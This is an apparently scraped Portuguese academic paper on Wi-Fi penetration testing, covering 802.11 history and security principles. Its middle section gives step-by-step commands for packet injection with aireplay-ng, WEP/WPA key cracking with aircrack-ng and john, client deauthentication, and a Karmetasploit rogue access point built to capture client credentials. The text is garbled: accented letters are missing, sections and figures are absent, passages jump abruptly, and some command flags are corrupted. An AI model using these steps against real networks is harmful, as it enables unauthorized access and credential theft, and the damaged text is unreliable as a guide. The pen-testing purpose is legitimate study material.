Escolar Documentos
Profissional Documentos
Cultura Documentos
Patrick Melo
patrickimelo@hotmail.com
Faculdade de Tecnologia de Teresina CET Teresina-PI-Brasil Abstract. Currently the wireless networks have remarkable growth both in the corporate environment and in captivity, but the safety issue is an aspect that deserves special attention, as a medium, but it is something that is not widespread. The identification and exploitation of the vulnerabilities of wireless networks (WLAN) are contained within the concept of penetration testing (Pen-Test), conceptually the PEN-TEST can also be defined as a set of techniques that we use to perform safety test. Holding PEN-TEST becomes an important mechanism to evaluate qualitatively and quantitatively even security problems that may be encountered. Must be used within a security planning methodology with well defined and concise. Resumo. Atualmente as redes sem fio tm notvel crescimento tanto em meio corporativo quanto em meio domstico, contudo o quesito segurana um aspecto que merece uma ateno especial, dado determinado meio, porm algo que no amplamente difundido. A identificao e explorao das vulnerabilidades das redes sem-fio (WLAN) esto contidas no mbito do conceito dos testes de penetrao (Pen-Test), conceitualmente o PEN-TEST tambm pode ser definido como um conjunto de tcnicas que podemos utilizar para realizao de teste de segurana. A realizao de PEN-TEST torna-se um mecanismo importante para avaliar de forma qualitativa e at mesmo quantitativa os problemas de segurana que venham a ser encontrados. Deve ser utilizado dentro de um planejamento de segurana bem definido e com metodologia concisa. Palavras-Chave: Redes, Wireless, Criptografia, Invaso, Internet, Pen-Test.
1. Introduo
O surgimento do servio sem fio comeou no sculo XIX, onde o pai do rdio Guglielmo Marconi deu os primeiros passos fazendo testes em ondas de rdio, onde criou a primeira fbrica de rdio de todo o mundo, que se chamava Wireless Telegraph and Signal Company Limited. J em 1901 aconteceu de receber sinais do outro lado do atlntico, e em 1905 foi utilizado o cdigo morse. Alguns anos aps, surgiu ento a ALOHANET que foi a primeira rede de pacotes que usava rdio frequncia no incio dos anos 70, era uma rede baseada em um terminal central que distribua as mensagens, que utilizava a topologia em estrela e fazia uso de CSMA. Com essa nova tecnologia, o IEEE (Institute of Electrical and Eletronics Engineers) constituiu um grupo de pesquisa para criar padres abertos e tornar a 1
tecnologia sem fio cada vez mais presente. O projeto denominado de Padro IEEE 802.11, nasceu em 1990, mas ficou inerte por aproximadamente sete anos devido a fatores que no permitiam que a tecnologia sem fio sasse do papel. Um dos principais fatores era a baixa taxa de transferncia de dados que inicialmente a tecnologia oferecia, que era entre 860Kbps 2Mbps. No decorrer do tempo a rede sem fio comeou a ser vista como uma tecnologia promissora e a receber ainda mais investimentos para a construo de equipamentos que possibilitassem a comunicao sem fio entre computadores. Atualmente o foco das redes de computadores sem fio (Wireless) se encontra no contexto das redes locais de computadores (Wireless Local Area Network - WLAN), tanto em solues proprietrias como no padro do IEEE. Primeiramente foram colocados em prtica alguns padres proprietrios, atravs de empresas como IBM, CISCO, Telecom e 3COM. Hoje essas e outras empresas baseiam seus produtos no padro do IEEE, devido s inmeras e j conhecidas vantagens que o padro aberto oferece: interoperabilidade, baixo custo, demanda de mercado, confiabilidade de projeto, entre outras. O padro IEEE 802.11 define basicamente uma arquitetura para as WLANs que abrange os nveis: fsico e de enlace. No nvel fsico so tratadas apenas as transmisses com freqncia de rdio (RF) e infravermelho (IR), embora outras formas de transmisso sem fio possam ser usadas, como microondas e laser, por exemplo. No nvel de enlace, o IEEE definiu um protocolo de controle de acesso ao meio (protocolo MAC), bastante semelhante ao protocolo usado em redes locais Ethernet (CSMA/CD).
2. Pen-Test
Quando se fala em segurana devem-se fazer algumas perguntas: Seguro contra o que? Seguro contra quem? Seguro em que condies? Segurana pode ser definido como dificultar ou impedir a ocorrncia de eventos indesejveis. A segurana da informao consiste na proteo de um conjunto de dados a fim de preservar o valor que o mesmo possui para um determinado indivduo ou organizao. Entre diversos objetivos a segurana trata alguns princpios bsicos que so: Confidencialidade Consiste em proteger a informao contra leitura e cpia por algum sem a devida autorizao do proprietrio da informao. Em redes de computadores significa que no trfego dos dados nenhuma informao poder ser vista, alterada ou capturada. Autenticidade Consiste na veracidade do emissor e receptor de informaes trocadas, geralmente implementada a partir de um mecanismo de senhas ou assinatura digital. Integridade - Consiste em proteger a informao contra modificao sem a permisso explcita do proprietrio daquela informao. Disponibilidade - Consiste na proteo dos servios prestados pelo sistema de forma que eles no sejam degradados ou se tornem indisponveis sem autorizao, assegurando ao usurio o acesso aos dados sempre que deles precisar. 2
Pen-test um mtodo que avalia a segurana de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma anlise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma m configurao do sistema, falhas em hardwares/softwares desconhecidas, deficincia no sistema operacional ou tcnicas contra medidas. Todas as anlises submetidas pelos testes escolhidos so apresentadas no sistema, junto com uma avaliao do seu impacto e muitas vezes com uma proposta de resoluo ou de uma soluo tcnica.
Pressione a tecla backspace e em seguida a tecla s e depois b, e selecione a rede alvo, para obter informaes sobre a rede alvo pressione a tecla enter.
Para efetuar a captura de pacotes devemos selecionar a rede alvo e ativar a tecla caps lock e em seguida digitar shift+l para que o KISMET comece a captura.
Agora para injetar trfego na rede deve-se colocar a interface em modo promscuo no canal da rede alvo, onde wlan2 refere-se a interface de rede e 5 o canal utilizado pela rede alvo, para isso utilizamos o seguinte comando: #airmon-ng start wlan2 5 Utilize a ferramenta aireplay-ng para a injeo de trfego na rede. O aireplay-ng faz parte da sute aircrack-ng. Para injetar trfego na rede alvo necessrio obter informaes como o BSSID do AP alvo e endereo fsico de sua interface de rede, obtendo essa informao s executar o seguinte comando em outro terminal: #apt-get install aircrack-ng
#aireplay-ng -3 -b 00:02:6F:61:DE:0B -h 00-1F-1F-13-0E-52 wlan2 Onde 00:02:6F:61:DE:0B o BSSID e o 00-1F-1F-13-0E-52 o endereo fsico de sua interface de rede ou de algum cliente conectado.
Os pacotes capturados pelo kismet se encontram no diretrio /var/log/kismet/, onde o arquivo utilizado para a descriptografar o arquivo Kismet-data-doteste.dump.
Para a descriptografia utilize o aircrack-ng, Com outro terminal entre no diretrio onde se encontram os pacotes capturados, em seguida execute a ferramenta selecionando a rede alvo. #cd /var/log/kismet
#aircrack-ng <nome_do_arquivo.dump>
Figura 6. Descriptografando
Aps a visualizao dos clientes conectados, selecione um endereo mac de um cliente conectado para forar a desautenticao seguida da captura dos handshakes, com os comandos a seguir: #airmon-ng start <interface de rede> <canal>
Usando Wordlist e mesclando com o john: #john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w <NOME DO ARQUIVO*.cap>
Existem tambm outros tipos de ferramentas de ataque customizado que exigem um pouco mais de conhecimento do atacante. Neste caso ser usada a distribuio Back track v4 que contm a sute de ferramentas Metasploit Framework, que conta com mais de 500 exploits para explorao de vulnerabilidades, onde a escolhida foi o Karma que um conjunto de 9
ferramentas para avaliar a segurana de clientes das redes sem fio em vrias camadas, e pode-se capturar credenciais ou explorar vulnerabilidades do lado do cliente no host. Pr-Requisitos: Voc precisa ter a sute aircrack-ng instalada, consulte http://www.aircrackng.org/doku.php?id=install_aircrack Karmetasploit requer um banco de dados back-end para estar no lugar antes que ele possa ser usado, isso pode ser conseguido atravs da execuo: # gem install sqlite3-ruby activerecord
Configurao Inicial: A primeira coisa que /etc/dhcpd/dhcpd.conf, precisamos configurar um servidor dhcp, em
10
Aps a configurao do servidor dhcp devemos iniciar o servio atravs do comando a seguir:
# /etc/init.d/dhcp3-server start Em seguida, atualize o banco de exploits do Metasploit, para isso entre no diretrio /pentest/exploits/framework3. # cd / pentest/exploits/framework3
# svn update Agora crie uma nova interface de modo monitor virtual:
# airmon-ng start wlan0 Obs: Isso ir criar um modo de interface mon0 monitor, use iwconfig para confirmar. Agora crie o novo ponto de acesso: # airbase-ng c 11 P -C 30 --essid "linksys"-v mon0 11
- c = canal - P = responda a todas as sondas e cria falsos SSIDS - C 30 = permitir balizamento de valores sondados ESSID (em segundos) -- essid = especificar um nico ESSID mon0 = interface de modo monitor virtual Adicione um ip a uma interface virtual atravs do comando: # ifconfig at0 10.0.0.1 netmask 255.255.255.0 up Edite o arquivo dhcp3-server que se encontra no diretrio abaixo para que a distribuio dos ips seja apenas pela interface at0 # vim /etc/default/dhcp3-server INTERFACES="at0" Logo aps entre no diretrio /pentest/exploits/framework3 para atualizar o banco do metasploit e rode o karmetasploit. 12
5. Tcnicas utilizadas
Network Scanning (varreduras); Vulnerability Scanning (anlises de vulnerabilidades); Password Cracking (bruteforce); Log Review (anlise de logs); Mitm Test (anlise a partir da LAN); War Driving (teste em sistema Wireless LAN); Warchalking (teste em sistema Wireless LAN); 13
6. Tcnicas Intrusivas
Explorao de vulnerabilidades conhecidas nos servios identificados; Explorao de Vulnerabilidades em aplicaes Web; Tcnicas de Bruteforce para servios e Cracking de Senhas; Testes de Negao de Servio (DOS); Escalada de Privilgios;
7. Concluso
Em geral, comum encontrar redes sem fio desprovidas de segurana e passveis de serem facilmente invadidas, comprometendo assim toda a rede, onde atualmente toda a informao digital tem um valor imensurvel para o meio coorporativo, sendo que ter seus dados capturados por um atacante algo que pode gerar danos irreparveis e fazer um pen-test algo a ser considerado para identificar as possveis vulnerabilidades da rede e as possibilidades de invaso. As redes sem fio so muito atraentes devido a sua facilidade e comodidade, todavia o quesito segurana deve estar em primeiro lugar.
8. Referncias
How Wi-Fi Works. Disponvel em <http://computer.howstuffworks.com/wirelessnetwork.htm>. Acessado em 30.04.2010. Novas Tecnologias de Redes. Disponvel em <http://www.guiadohardware.net/tutoriais/061/>. Acessado em 10.04.2010. Entendendo (e quebrando) a Segurana em Redes Wireless. Disponvel em <http://www.guiadohardware.net/tutoriais/121/>. Acessado em 16.04.2010. Plano de Atribuio, Destinao e Distribuio de Faixas de Freqncias no Brasil. Disponvel em <http://www.anatel.gov.br/Tools/frame.asp?link=/biblioteca/planos/plano_atribuicao_2 006.pdf>. Acessado em 15.04.2010. <http://www.ieee.org> Acessado em 11.04.2010 Guerrini, I. M., Luz: Fundamentos tericos. Disponvel em<http://educar.sc.usp.br/otica/luz.htm>. Acessado em 08.05.2010. <http://www.dec.ufcg.edu.br>. Acessado em 15.05.2010
14